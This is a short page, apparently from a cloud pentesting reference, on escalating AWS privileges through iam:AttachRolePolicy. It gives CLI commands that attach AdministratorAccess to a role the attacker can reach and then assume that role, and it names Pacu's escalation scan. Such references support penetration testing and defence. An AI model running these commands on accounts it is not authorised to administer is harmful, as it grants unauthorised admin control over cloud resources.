AttachRolePolicy

iam:AttachRolePolicy attaches a managed policy to a role. If you can already assume a role (or pass it to a service), attaching AdministratorAccess to that role turns it into an admin role you then use.

Attach then assume#

bash
aws iam attach-role-policy --role-name <assumable-role> \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws sts assume-role --role-arn arn:aws:iam::<acct>:role/<assumable-role> \
  --role-session-name s

Exploitation notes#

  • Pair with role assumption: the attach is only useful on a role you can reach, by assuming it or passing it to a service.
  • Pre-existing session credentials for the role do not pick up the new policy until a fresh AssumeRole.

Tools#

  • AWS CLI (iam attach-role-policy, sts assume-role).
  • Pacu (iam__privesc_scan).

References#

Cookie Consent

We use cookies to enhance your experience. Learn more